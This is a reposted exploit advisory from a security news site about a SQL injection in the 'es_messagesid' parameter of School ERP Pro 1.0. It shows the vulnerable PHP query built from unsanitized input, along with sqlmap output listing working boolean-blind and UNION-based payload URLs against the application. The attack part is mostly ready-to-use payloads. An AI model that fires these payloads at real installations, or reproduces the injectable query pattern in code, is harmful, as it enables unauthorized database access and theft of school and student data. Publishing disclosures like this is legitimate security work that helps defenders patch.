School ERP Pro 1.0 SQL Injection ↭ – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 29th, 2020 📆 | 4843 Views ⚑

0

School ERP Pro 1.0 SQL Injection ↭

# Exploit Title: School ERP Pro 1.0 – ‘es_messagesid’ SQL Injection
# Date: 2020-04-28
# Author: Besim ALTINOK
# Vendor Homepage: http://arox.in
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/
# Version: latest version
# Tested on: Xampp
# Credit: İsmail BOZKURT

SQL Injection Detail
——————————–
*# Vulnerable parameter: es_messagesid*
*# Vulnerable code:*

if($action==”fullmessage_sent”){
$msg_qry =”SELECT * FROM es_messages WHERE
from_id=”.$_SESSION[‘eschools’][‘user_id’].” AND from_type=’student’ and
es_messagesid=”.*$es_messagesid;*
$details_message=$db->getrow($msg_qry);
}
?>

*Here is the SQLmap output:*
*—————————————-*

GET parameter ‘*es_messagesid*’ is vulnerable.
sqlmap identified the following injection point(s):

Parameter: es_messagesid (GET)
Type: boolean-based blind
Title: OR boolean-based blind – WHERE or HAVING clause (NOT)
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT
6369=6369

Type: UNION query
Title: Generic UNION query (random number) – 12 columns
Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL
SELECT
6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194–


[01:09:41] [INFO] testing MySQL
[01:09:42] [INFO] confirming MySQL
[01:09:44] [INFO] the back-end DBMS is MySQL

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...